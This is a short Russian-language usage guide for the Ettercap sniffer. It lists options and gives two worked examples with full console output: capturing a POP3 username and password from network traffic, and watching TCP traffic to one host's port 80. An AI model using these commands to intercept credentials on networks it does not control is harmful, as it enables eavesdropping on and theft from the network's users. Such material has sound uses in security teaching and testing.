Ettercap
Запуск :ettercap [опции] TARGET1 TARGET2
TARGET1 - источник
TARGET2 - назначение
Формат TARGETS
:
MACs/IPs/PORTs
Опции :-T, --text - использовать только текстовый интерфейс
-q, --quiet - не отображать содержимое пакетов
-L, --log <> - указание файла логов
-i, --iface <> - указание сетевого интерфейса для прослушивания
-P, --plugin <> - активация плагина
-F, --filter <> - использование фильтров
Примеры :
1) Прослушка пароля
root@m-pc:~# ettercap -Tq
ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA
Dissector "dns" not supported (etter.conf line 70)
Listening on eth0... (Ethernet)
eth0 -> 00:09:61:9A:7B:2D 192.168.0.2 255.255.255.0
SSL dissection needs a valid 'redir_command_on' script in the etter.conf file
Privileges dropped to UID 65534 GID 65534...
28 plugins
39 protocol dissectors
53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services
Starting Unified sniffing...
Text only Interface activated...
Hit 'h' for inline help
POP : 94.100.177.6:110 -> USER: user_1 PASS: 12345
2) Прослушка определенного порта у определенного хоста
root@m-pc:~# ettercap -Tt tcp // /192.168.0.1/80
ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA
Dissector "dns" not supported (etter.conf line 70)
Listening on eth0... (Ethernet)
eth0 -> 00:09:61:9A:7B:2D 192.168.0.2 255.255.255.0
SSL dissection needs a valid 'redir_command_on' script in the etter.conf file
Privileges dropped to UID 65534 GID 65534...
28 plugins
39 protocol dissectors
53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services
Randomizing 255 hosts for scanning...
Scanning the whole netmask for 255 hosts...
* |==================================================>| 100.00 %
1 hosts added to the hosts list...
Starting Unified sniffing...
Text only Interface activated...
Hit 'h' for inline help
Fri Apr 3 00:00:43 2009
TCP 192.168.0.2:38137 --> 192.168.0.1:80 | S
Fri Apr 3 00:00:43 2009
TCP 192.168.0.1:80 --> 192.168.0.2:38137 | RA
Fri Apr 3 00:00:43 2009
TCP 192.168.0.2:38138 --> 192.168.0.1:80 | S
Fri Apr 3 00:00:43 2009
TCP 192.168.0.1:80 --> 192.168.0.2:38138 | RA
Fri Apr 3 00:00:46 2009
TCP 192.168.0.2:38142 --> 192.168.0.1:80 | S
Fri Apr 3 00:00:46 2009
TCP 192.168.0.1:80 --> 192.168.0.2:38142 | RA